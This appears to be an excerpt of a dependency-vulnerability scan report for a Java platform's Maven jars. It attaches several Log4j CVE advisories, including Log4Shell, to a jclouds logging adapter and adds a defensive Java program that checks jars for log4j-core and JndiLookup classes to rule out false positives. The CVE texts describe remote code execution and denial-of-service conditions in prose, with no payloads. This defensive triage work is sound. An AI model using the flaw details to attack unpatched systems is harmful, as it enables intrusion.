Vendor | pom | artifactid | jaxb-runtime | Low
Vendor | pom | groupid | org.glassfish.jaxb | Highest
Vendor | pom | name | JAXB Runtime | High
Vendor | pom | parent-artifactid | jaxb-runtime-parent | Low
Vendor | pom | parent-groupid | com.sun.xml.bind.mvn | Medium
Product | file | name | jaxb-runtime | High
Product | jar | package name | bind | Highest
Product | jar | package name | sun | Highest
Product | jar | package name | xml | Highest
Product | Manifest | git-revision | ae93d95 | Low
Product | Manifest | Implementation-Title | JAXB Implementation | High
Product | Manifest | specification-title | Java Architecture for XML Binding | Medium
Product | pom | artifactid | jaxb-runtime | Highest
Product | pom | groupid | org.glassfish.jaxb | Highest
Product | pom | name | JAXB Runtime | High
Product | pom | parent-artifactid | jaxb-runtime-parent | Medium
Product | pom | parent-groupid | com.sun.xml.bind.mvn | Medium
Version | file | version | 2.3.2 | High
Version | Manifest | build-id | 2.3.2 | Medium
Version | Manifest | Implementation-Version | 2.3.2 | High
Version | Manifest | major-version | 2.3.2 | Medium
Version | pom | version | 2.3.2 | Highest

jaxb-svg11-1.0.2.jar
Description: JAXB classes modelling SVG 1.1
License: Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/plutext/jaxb-svg11/1.0.2/jaxb-svg11-1.0.2.jar
MD5: 91f22bed36295692c384e846dfc460b0
SHA1: 3c0cd54d5691f5b5f8c60ed0c06353ff1db424e1
SHA256: 6799f39d49d9dbfef140e76b33d0884d55372935768a3955900eb022576a760d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jaxb-svg11 | High
Vendor | jar | package name | jaxb | Highest
Vendor | jar | package name | jaxb | Low
Vendor | jar | package name | plutext | Highest
Vendor | jar | package name | plutext | Low
Vendor | jar | package name | svg | Highest
Vendor | jar | package name | svg11 | Highest
Vendor | jar | package name | svg11 | Low
Vendor | pom | artifactid | jaxb-svg11 | Highest
Vendor | pom | artifactid | jaxb-svg11 | Low
Vendor | pom | developer email | jason@plutext.org | Low
Vendor | pom | developer id | jharrop | Medium
Vendor | pom | developer name | Jason Harrop | Medium
Vendor | pom | developer org | Plutext | Medium
Vendor | pom | groupid | org.plutext | Highest
Vendor | pom | name | jaxb-svg11 | High
Vendor | pom | url | plutext/JAXB-classes-for-SVG | Highest
Product | file | name | jaxb-svg11 | High
Product | jar | package name | jaxb | Highest
Product | jar | package name | jaxb | Low
Product | jar | package name | plutext | Highest
Product | jar | package name | svg | Highest
Product | jar | package name | svg11 | Highest
Product | jar | package name | svg11 | Low
Product | pom | artifactid | jaxb-svg11 | Highest
Product | pom | developer email | jason@plutext.org | Low
Product | pom | developer id | jharrop | Low
Product | pom | developer name | Jason Harrop | Low
Product | pom | developer org | Plutext | Low
Product | pom | groupid | org.plutext | Highest
Product | pom | name | jaxb-svg11 | High
Product | pom | url | plutext/JAXB-classes-for-SVG | High
Version | file | version | 1.0.2 | High
Version | pom | version | 1.0.2 | Highest

jaxb-xjc-2.3.2.jar
Description: JAXB Binding Compiler. Contains source code needed for binding customization files into java sources. In other words: the *tool* to generate java classes for the given xml representation.
File Path: /var/simplicite/.m2/repository/org/glassfish/jaxb/jaxb-xjc/2.3.2/jaxb-xjc-2.3.2.jar
MD5: 1c78df3990145ef0acfeb83c1d2ae567
SHA1: 9cfd86529359747d07251c017d4e46254faa2c2b
SHA256: b68ad7eeb5c0b514114897c37ff7efb8885419d03fd6e8e5fae2d4ce76f51d89
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jaxb-xjc | High
Vendor | jar | package name | com | Highest
Vendor | jar | package name | sun | Highest
Vendor | jar | package name | xjc | Highest
Vendor | jar (hint) | package name | oracle | Highest
Vendor | Manifest | git-revision | ae93d95 | Low
Vendor | Manifest | Implementation-Vendor | Oracle | High
Vendor | Manifest | Implementation-Vendor-Id | com.oracle | Medium
Vendor | Manifest | multi-release | true | Low
Vendor | Manifest (hint) | Implementation-Vendor | sun | High
Vendor | pom | artifactid | jaxb-xjc | Highest
Vendor | pom | artifactid | jaxb-xjc | Low
Vendor | pom | groupid | org.glassfish.jaxb | Highest
Vendor | pom | name | JAXB XJC | High
Vendor | pom | parent-artifactid | jaxb-parent | Low
Vendor | pom | parent-groupid | com.sun.xml.bind.mvn | Medium
Product | file | name | jaxb-xjc | High
Product | jar | package name | com | Highest
Product | jar | package name | sun | Highest
Product | jar | package name | xjc | Highest
Product | Manifest | git-revision | ae93d95 | Low
Product | Manifest | Implementation-Title | JAXB Implementation | High
Product | Manifest | multi-release | true | Low
Product | Manifest | specification-title | Java Architecture for XML Binding | Medium
Product | pom | artifactid | jaxb-xjc | Highest
Product | pom | groupid | org.glassfish.jaxb | Highest
Product | pom | name | JAXB XJC | High
Product | pom | parent-artifactid | jaxb-parent | Medium
Product | pom | parent-groupid | com.sun.xml.bind.mvn | Medium
Version | file | version | 2.3.2 | High
Version | Manifest | build-id | 2.3.2 | Medium
Version | Manifest | Implementation-Version | 2.3.2 | High
Version | Manifest | major-version | 2.3.2 | Medium
Version | pom | version | 2.3.2 | Highest

jbig2-imageio-3.0.2.jar
Description: Java Image I/O plugin for reading JBIG2-compressed image data. Formerly known as the levigo JBig2 ImageIO plugin (com.levigo.jbig2:levigo-jbig2-imageio).
File Path: /var/simplicite/.m2/repository/org/apache/pdfbox/jbig2-imageio/3.0.2/jbig2-imageio-3.0.2.jar
MD5: 75dacf14cc468045f89d7f5fff1aa494
SHA1: 46a53edceceabcdf9b81cd6d14f052bdfa171f4b
SHA256: 3dc510cd41511f2e2382eb7ac3550b2f94e21847f0b7221be8ddd0f2252a8fe4
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jbig2-imageio | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | image | Highest
Vendor | jar | package name | jbig2 | Highest
Vendor | jar | package name | pdfbox | Highest
Vendor | Manifest | implementation-url | https://www.apache.org/jbig2-imageio/ | Low
Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | org.apache.pdfbox | Medium
Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low
Vendor | pom | artifactid | jbig2-imageio | Highest
Vendor | pom | artifactid | jbig2-imageio | Low
Vendor | pom | developer id | adam | Medium
Vendor | pom | developer id | blitchfield | Medium
Vendor | pom | developer id | carrier | Medium
Vendor | pom | developer id | danielwilson | Medium
Vendor | pom | developer id | gbailleul | Medium
Vendor | pom | developer id | hennejg | Medium
Vendor | pom | developer id | holdersn | Medium
Vendor | pom | developer id | jahewson | Medium
Vendor | pom | developer id | jeremias | Medium
Vendor | pom | developer id | jukka | Medium
Vendor | pom | developer id | kjackson | Medium
Vendor | pom | developer id | koch | Medium
Vendor | pom | developer id | koehlecn | Medium
Vendor | pom | developer id | lehmi | Medium
Vendor | pom | developer id | leleueri | Medium
Vendor | pom | developer id | mmayer | Medium
Vendor | pom | developer id | msayhoun | Medium
Vendor | pom | developer id | pkoch | Medium
Vendor | pom | developer id | tallison | Medium
Vendor | pom | developer id | tboehme | Medium
Vendor | pom | developer id | tchojecki | Medium
Vendor | pom | developer id | tilman | Medium
Vendor | pom | developer id | vfed | Medium
Vendor | pom | developer name | Adam Nichols | Medium
Vendor | pom | developer name | Andreas Lehmkühler | Medium
Vendor | pom | developer name | Ben Litchfield | Medium
Vendor | pom | developer name | Brian Carrier | Medium
Vendor | pom | developer name | Carolin Köhler | Medium
Vendor | pom | developer name | Daniel Wilson | Medium
Vendor | pom | developer name | Eric Leleu | Medium
Vendor | pom | developer name | Guillaume Bailleul | Medium
Vendor | pom | developer name | Jeremias Maerki | Medium
Vendor | pom | developer name | Johannes Koch | Medium
Vendor | pom | developer name | John Hewson | Medium
Vendor | pom | developer name | Jukka Zitting | Medium
Vendor | pom | developer name | Jörg Henne | Medium
Vendor | pom | developer name | Kevin Jackson | Medium
Vendor | pom | developer name | Maruan Sayhoun | Medium
Vendor | pom | developer name | Matthäus Mayer | Medium
Vendor | pom | developer name | Phillipp Koch | Medium
Vendor | pom | developer name | Sebastian Holder | Medium
Vendor | pom | developer name | Thomas Chojecki | Medium
Vendor | pom | developer name | Tilman Hausherr | Medium
Vendor | pom | developer name | Tim Allison | Medium
Vendor | pom | developer name | Timo Boehme | Medium
Vendor | pom | developer name | Villu Ruusmann | Medium
Vendor | pom | groupid | org.apache.pdfbox | Highest
Vendor | pom | name | PDFBox JBIG2 ImageIO plugin | High
Vendor | pom | organization name | The Apache Software Foundation | High
Vendor | pom | organization url | http://pdfbox.apache.org | Medium
Vendor | pom | parent-artifactid | apache | Low
Vendor | pom | parent-groupid | org.apache | Medium
Product | file | name | jbig2-imageio | High
Product | jar | package name | apache | Highest
Product | jar | package name | image | Highest
Product | jar | package name | jbig2 | Highest
Product | jar | package name | pdfbox | Highest
Product | Manifest | Implementation-Title | PDFBox JBIG2 ImageIO plugin | High
Product | Manifest | implementation-url | https://www.apache.org/jbig2-imageio/ | Low
Product | Manifest | specification-title | PDFBox JBIG2 ImageIO plugin | Medium
Product | pom | artifactid | jbig2-imageio | Highest
Product | pom | developer id | adam | Low
Product | pom | developer id | blitchfield | Low
Product | pom | developer id | carrier | Low
Product | pom | developer id | danielwilson | Low
Product | pom | developer id | gbailleul | Low
Product | pom | developer id | hennejg | Low
Product | pom | developer id | holdersn | Low
Product | pom | developer id | jahewson | Low
Product | pom | developer id | jeremias | Low
Product | pom | developer id | jukka | Low
Product | pom | developer id | kjackson | Low
Product | pom | developer id | koch | Low
Product | pom | developer id | koehlecn | Low
Product | pom | developer id | lehmi | Low
Product | pom | developer id | leleueri | Low
Product | pom | developer id | mmayer | Low
Product | pom | developer id | msayhoun | Low
Product | pom | developer id | pkoch | Low
Product | pom | developer id | tallison | Low
Product | pom | developer id | tboehme | Low
Product | pom | developer id | tchojecki | Low
Product | pom | developer id | tilman | Low
Product | pom | developer id | vfed | Low
Product | pom | developer name | Adam Nichols | Low
Product | pom | developer name | Andreas Lehmkühler | Low
Product | pom | developer name | Ben Litchfield | Low
Product | pom | developer name | Brian Carrier | Low
Product | pom | developer name | Carolin Köhler | Low
Product | pom | developer name | Daniel Wilson | Low
Product | pom | developer name | Eric Leleu | Low
Product | pom | developer name | Guillaume Bailleul | Low
Product | pom | developer name | Jeremias Maerki | Low
Product | pom | developer name | Johannes Koch | Low
Product | pom | developer name | John Hewson | Low
Product | pom | developer name | Jukka Zitting | Low
Product | pom | developer name | Jörg Henne | Low
Product | pom | developer name | Kevin Jackson | Low
Product | pom | developer name | Maruan Sayhoun | Low
Product | pom | developer name | Matthäus Mayer | Low
Product | pom | developer name | Phillipp Koch | Low
Product | pom | developer name | Sebastian Holder | Low
Product | pom | developer name | Thomas Chojecki | Low
Product | pom | developer name | Tilman Hausherr | Low
Product | pom | developer name | Tim Allison | Low
Product | pom | developer name | Timo Boehme | Low
Product | pom | developer name | Villu Ruusmann | Low
Product | pom | groupid | org.apache.pdfbox | Highest
Product | pom | name | PDFBox JBIG2 ImageIO plugin | High
Product | pom | organization name | The Apache Software Foundation | Low
Product | pom | organization url | http://pdfbox.apache.org | Low
Product | pom | parent-artifactid | apache | Medium
Product | pom | parent-groupid | org.apache | Medium
Version | file | version | 3.0.2 | High
Version | Manifest | Implementation-Version | 3.0.2 | High
Version | pom | parent-version | 3.0.2 | Low
Version | pom | version | 3.0.2 | Highest

jcip-annotations-1.0.jar
File Path: /var/simplicite/.m2/repository/net/jcip/jcip-annotations/1.0/jcip-annotations-1.0.jar
MD5: 9d5272954896c5a5d234f66b7372b17a
SHA1: afba4942caaeaf46aab0b976afd57cc7c181467e
SHA256: be5805392060c71474bf6c9a67a099471274d30b83eef84bfc4e0889a4f1dcc0
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jcip-annotations | High
Vendor | jar | package name | annotations | Highest
Vendor | jar | package name | annotations | Low
Vendor | jar | package name | jcip | Highest
Vendor | jar | package name | jcip | Low
Vendor | jar | package name | net | Highest
Vendor | jar | package name | net | Low
Vendor | pom | artifactid | jcip-annotations | Highest
Vendor | pom | artifactid | jcip-annotations | Low
Vendor | pom | groupid | net.jcip | Highest
Vendor | pom | name | "Java Concurrency in Practice" book annotations | High
Vendor | pom | url | http://jcip.net/ | Highest
Product | file | name | jcip-annotations | High
Product | jar | package name | annotations | Highest
Product | jar | package name | annotations | Low
Product | jar | package name | jcip | Highest
Product | jar | package name | jcip | Low
Product | jar | package name | net | Highest
Product | pom | artifactid | jcip-annotations | Highest
Product | pom | groupid | net.jcip | Highest
Product | pom | name | "Java Concurrency in Practice" book annotations | High
Product | pom | url | http://jcip.net/ | Medium
Version | file | version | 1.0 | High
Version | pom | version | 1.0 | Highest

jcl-over-slf4j-1.7.30.jar
Description: JCL 1.2 implemented over SLF4J
License: Apache License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/slf4j/jcl-over-slf4j/1.7.30/jcl-over-slf4j-1.7.30.jar
MD5: 69ad224b2feb6f86554fe8997b9c3d4b
SHA1: cd92524ea19d27e5b94ecd251e1af729cffdfe15
SHA256: 71e9ee37b9e4eb7802a2acc5f41728a4cf3915e7483d798db3b4ff2ec8847c50
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jcl-over-slf4j | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | commons | Highest
Vendor | jar | package name | logging | Highest
Vendor | Manifest | automatic-module-name | org.apache.commons.logging | Medium
Vendor | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5 | Low
Vendor | Manifest | bundle-symbolicname | jcl.over.slf4j | Medium
Vendor | pom | artifactid | jcl-over-slf4j | Highest
Vendor | pom | artifactid | jcl-over-slf4j | Low
Vendor | pom | groupid | org.slf4j | Highest
Vendor | pom | name | JCL 1.2 implemented over SLF4J | High
Vendor | pom | parent-artifactid | slf4j-parent | Low
Vendor | pom | url | http://www.slf4j.org | Highest
Product | file | name | jcl-over-slf4j | High
Product | jar | package name | apache | Highest
Product | jar | package name | commons | Highest
Product | jar | package name | logging | Highest
Product | Manifest | automatic-module-name | org.apache.commons.logging | Medium
Product | Manifest | Bundle-Name | jcl-over-slf4j | Medium
Product | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5 | Low
Product | Manifest | bundle-symbolicname | jcl.over.slf4j | Medium
Product | Manifest | Implementation-Title | jcl-over-slf4j | High
Product | pom | artifactid | jcl-over-slf4j | Highest
Product | pom | groupid | org.slf4j | Highest
Product | pom | name | JCL 1.2 implemented over SLF4J | High
Product | pom | parent-artifactid | slf4j-parent | Medium
Product | pom | url | http://www.slf4j.org | Medium
Version | file | version | 1.7.30 | High
Version | Manifest | Bundle-Version | 1.7.30 | High
Version | Manifest | Implementation-Version | 1.7.30 | High
Version | pom | version | 1.7.30 | Highest

jclouds-core-2.2.0.jar
Description: Core components to access jclouds services
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/jclouds-core/2.2.0/jclouds-core-2.2.0.jar
MD5: 29914e31e40bc56f933abf680e9b5954
SHA1: 488b7d20b163057e6d9767b2073714333f6c708a
SHA256: df69b0c8b13bf34465b42c1dd32b7200a9e5cf9b4cda9ea22bc5f34ad222ceec
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jclouds-core | High
Vendor | jar | package name | jclouds | Highest
Vendor | Manifest | bundle-docurl | http://www.apache.org/ | Low
Vendor | Manifest | bundle-symbolicname | jclouds-core | Medium
Vendor | Manifest | Implementation-Vendor | jclouds | High
Vendor | Manifest | Implementation-Vendor-Id | org.jclouds | Medium
Vendor | Manifest | specification-vendor | jclouds | Low
Vendor | pom | artifactid | jclouds-core | Highest
Vendor | pom | artifactid | jclouds-core | Low
Vendor | pom | groupid | org.apache.jclouds | Highest
Vendor | pom | name | jclouds Components Core | High
Vendor | pom | parent-artifactid | jclouds-project | Low
Product | file | name | jclouds-core | High
Product | jar | package name | http | Highest
Product | jar | package name | jclouds | Highest
Product | Manifest | bundle-docurl | http://www.apache.org/ | Low
Product | Manifest | Bundle-Name | jclouds Components Core | Medium
Product | Manifest | bundle-symbolicname | jclouds-core | Medium
Product | Manifest | Implementation-Title | jclouds Components Core | High
Product | Manifest | specification-title | jclouds jclouds Components Core | Medium
Product | pom | artifactid | jclouds-core | Highest
Product | pom | groupid | org.apache.jclouds | Highest
Product | pom | name | jclouds Components Core | High
Product | pom | parent-artifactid | jclouds-project | Medium
Version | file | version | 2.2.0 | High
Version | Manifest | Bundle-Version | 2.2.0 | High
Version | Manifest | Implementation-Version | 2.2.0 | High
Version | pom | version | 2.2.0 | Highest
Related Dependencies:
jclouds-blobstore-2.2.0.jar
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/jclouds-blobstore/2.2.0/jclouds-blobstore-2.2.0.jar
MD5: 4c462eabbb65bd6eea749bc64931f912
SHA1: 0c0ed60ebf402f790801f164d10aff483b6c5372
SHA256: 35215cbde4636f4b0959516f74a99fb6e9807e1cd058c315e8f64758641f43cc
pkg:maven/org.apache.jclouds/jclouds-blobstore@2.2.0
jclouds-gson-2.2.0.jar
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/jclouds-gson/2.2.0/jclouds-gson-2.2.0.jar
MD5: 0fc746e6cceab1b7b57cfd94a0d9f8c4
SHA1: 379e3820cfadf378cb76b511d005c45c7b6b3c67
SHA256: bf8c96aa90286ea63afe0d3ceaa3d44191b59ec89c5b012f3720d65538c688ee
pkg:maven/org.apache.jclouds/jclouds-gson@2.2.0
jclouds-slf4j-2.2.0.jar
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/driver/jclouds-slf4j/2.2.0/jclouds-slf4j-2.2.0.jar
MD5: a6bcb22c606446466041b3b8272f510c
SHA1: a10393a54791b04b62a995e5c605f6d771efb8cc
SHA256: 7ccf7df8b397cbf54fdee68abd5a3fec55b3f560faafdb47d568fb251faf3f95
pkg:maven/org.apache.jclouds.driver/jclouds-slf4j@2.2.0

jclouds-log4j-2.2.0.jar
Description: jclouds Log4J Logging Module
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/driver/jclouds-log4j/2.2.0/jclouds-log4j-2.2.0.jar
MD5: fece8cd73ad778783c7afa58d1a4b512
SHA1: 20ab9d90c50e6343a2a5f023dc93a2935828005f
SHA256: 3da7521e48790521e48ebe9a70292ec2e8d180a40b8fcb6852cf0029de397d37
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jclouds-log4j | High
Vendor | jar | package name | jclouds | Highest
Vendor | jar | package name | log4j | Highest
Vendor | jar | package name | logging | Highest
Vendor | Manifest | bundle-docurl | http://www.apache.org/ | Low
Vendor | Manifest | bundle-symbolicname | jclouds-log4j | Medium
Vendor | Manifest | Implementation-Vendor | jclouds | High
Vendor | Manifest | Implementation-Vendor-Id | org.jclouds | Medium
Vendor | Manifest | specification-vendor | jclouds | Low
Vendor | pom | artifactid | jclouds-log4j | Highest
Vendor | pom | artifactid | jclouds-log4j | Low
Vendor | pom | groupid | org.apache.jclouds.driver | Highest
Vendor | pom | name | jclouds Log4J Logging Module | High
Vendor | pom | parent-artifactid | jclouds-project | Low
Vendor | pom | parent-groupid | org.apache.jclouds | Medium
Product | file | name | jclouds-log4j | High
Product | jar | package name | jclouds | Highest
Product | jar | package name | log4j | Highest
Product | jar | package name | logging | Highest
Product | Manifest | bundle-docurl | http://www.apache.org/ | Low
Product | Manifest | Bundle-Name | jclouds Log4J Logging Module | Medium
Product | Manifest | bundle-symbolicname | jclouds-log4j | Medium
Product | Manifest | Implementation-Title | jclouds Log4J Logging Module | High
Product | Manifest | specification-title | jclouds jclouds Log4J Logging Module | Medium
Product | pom | artifactid | jclouds-log4j | Highest
Product | pom | groupid | org.apache.jclouds.driver | Highest
Product | pom | name | jclouds Log4J Logging Module | High
Product | pom | parent-artifactid | jclouds-project | Medium
Product | pom | parent-groupid | org.apache.jclouds | Medium
Version | file | version | 2.2.0 | High
Version | Manifest | Bundle-Version | 2.2.0 | High
Version | Manifest | Implementation-Version | 2.2.0 | High
Version | pom | version | 2.2.0 | Highest
CVE-2021-44228
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
CWE: CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion'), CWE-502 Deserialization of Untrusted Data, CWE-20 Improper Input Validation
CVSSv2: Base Score: HIGH (9.3) Vector: /AV:N/AC:M/Au:N/C:C/I:C/A:C
CVSSv3: Base Score: CRITICAL (10.0) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2017-5645
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
CWE: CWE-502 Deserialization of Untrusted Data
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2021-45046
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
CWE: CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
CVSSv2: Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P
CVSSv3: Base Score: CRITICAL (9.0) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2021-44832
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.
CWE: CWE-20 Improper Input Validation
CVSSv2: Base Score: HIGH (8.5) Vector: /AV:N/AC:M/Au:S/C:C/I:C/A:C
CVSSv3: Base Score: MEDIUM (6.6) Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2021-45105
Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.
CWE: CWE-20 Improper Input Validation, CWE-674 Uncontrolled Recursion
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2020-9488
Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1
CWE: CWE-295 Improper Certificate Validation
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: LOW (3.7) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
References:
Vulnerable Software & Versions:
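All six findings above are attached to jclouds-log4j-2.2.0.jar, whose evidence identifies it as the jclouds Log4J logging driver (groupid org.apache.jclouds.driver, vendor jclouds), while the CVE text itself says the flaws live in log4j-core. Dependency-Check matches on vendor/product/version evidence, and the head of this report warns that false positives exist, so the practitioner's next step is to look at what is actually in the repository: which jar, if any, carries log4j-core classes, and at which version. The program below is an added example written for this page; it is not part of Dependency-Check or of the Simplicite platform. It walks a directory of jars (by default the local Maven repository that the File Paths above point into), hashes each jar so it can be matched against the SHA256 values in this report, reads the Maven coordinates from META-INF/maven/.../pom.properties, and checks for two class paths inside the jar: org/apache/logging/log4j/core/LogEvent.class (present in any log4j-core 2.x build) and org/apache/logging/log4j/core/lookup/JndiLookup.class (the JNDI lookup behind CVE-2021-44228, whose removal from the jar was Apache's published workaround). A jar that matched only on its name contains neither.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Properties;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;
import java.util.stream.Collectors;
import java.util.stream.Stream;

/**
 * Added triage helper (example code; not part of this report, of Dependency-Check
 * or of the Simplicite platform). For every jar under a directory it records the
 * SHA-256 (to match against the report), the Maven coordinates read from
 * META-INF/maven/<groupId>/<artifactId>/pom.properties, and whether the jar
 * actually contains log4j-core 2.x classes.
 */
public final class Log4jJarTriage {

    /** Present in every log4j-core 2.x jar. */
    static final String LOG4J2_CORE_MARKER = "org/apache/logging/log4j/core/LogEvent.class";

    /** The JNDI lookup class behind CVE-2021-44228; deleting it from the jar was Apache's published workaround. */
    static final String JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class";

    public static final class Finding {
        public final Path jar;
        public final String sha256;
        public final String coordinates;   // groupId:artifactId:version, or "unknown"
        public final boolean hasLog4j2Core;
        public final boolean hasJndiLookup;

        Finding(Path jar, String sha256, String coordinates, boolean hasLog4j2Core, boolean hasJndiLookup) {
            this.jar = jar;
            this.sha256 = sha256;
            this.coordinates = coordinates;
            this.hasLog4j2Core = hasLog4j2Core;
            this.hasJndiLookup = hasJndiLookup;
        }

        public String summary() {
            String verdict = hasLog4j2Core
                    ? (hasJndiLookup ? "log4j-core, JndiLookup.class present" : "log4j-core, JndiLookup.class absent")
                    : "no log4j-core classes";
            return jar.getFileName() + "  " + coordinates + "  sha256=" + sha256 + "  -> " + verdict;
        }
    }

    /** Hash one jar, read its Maven coordinates and look for the two marker classes. */
    public static Finding inspect(Path jarPath) throws IOException {
        String coordinates = "unknown";
        boolean core = false;
        boolean jndi = false;
        try (JarFile jar = new JarFile(jarPath.toFile(), false)) {   // no signature verification needed here
            for (JarEntry entry : Collections.list(jar.entries())) {
                String name = entry.getName();
                if (name.equals(LOG4J2_CORE_MARKER)) {
                    core = true;
                } else if (name.equals(JNDI_LOOKUP)) {
                    jndi = true;
                } else if (name.startsWith("META-INF/maven/") && name.endsWith("/pom.properties")) {
                    Properties p = new Properties();
                    try (InputStream in = jar.getInputStream(entry)) {
                        p.load(in);
                    }
                    coordinates = p.getProperty("groupId", "?") + ":" + p.getProperty("artifactId", "?")
                            + ":" + p.getProperty("version", "?");
                }
            }
        }
        return new Finding(jarPath, sha256Hex(jarPath), coordinates, core, jndi);
    }

    /** Inspect every *.jar below root (a Maven repository or an exploded classpath). */
    public static List<Finding> scan(Path root) throws IOException {
        List<Path> jars;
        try (Stream<Path> files = Files.walk(root)) {
            jars = files.filter(f -> f.toString().endsWith(".jar")).collect(Collectors.toList());
        }
        List<Finding> findings = new ArrayList<>();
        for (Path jar : jars) {
            findings.add(inspect(jar));
        }
        return findings;
    }

    static String sha256Hex(Path file) throws IOException {
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256").digest(Files.readAllBytes(file));
            StringBuilder hex = new StringBuilder(64);
            for (byte b : digest) {
                hex.append(String.format("%02x", b));
            }
            return hex.toString();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 is mandatory in every JRE", e);
        }
    }

    public static void main(String[] args) throws IOException {
        Path root = Path.of(args.length > 0 ? args[0] : System.getProperty("user.home") + "/.m2/repository");
        for (Finding f : scan(root)) {
            // Report jars that carry log4j-core classes, plus jars whose name alone suggests log4j,
            // so that name-only matches such as jclouds-log4j show up beside the real artifact.
            if (f.hasLog4j2Core || f.jar.getFileName().toString().contains("log4j")) {
                System.out.println(f.summary());
            }
        }
    }
}
```

Run it as `javac Log4jJarTriage.java && java Log4jJarTriage /var/simplicite/.m2/repository`. Whether any of the six CVEs applies is then decided by the version of the log4j-core jar that is found (compared against the version ranges in the CVE text above), not by the adapter's file name; if no jar carries log4j-core classes at all, the findings on jclouds-log4j are name-only matches.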
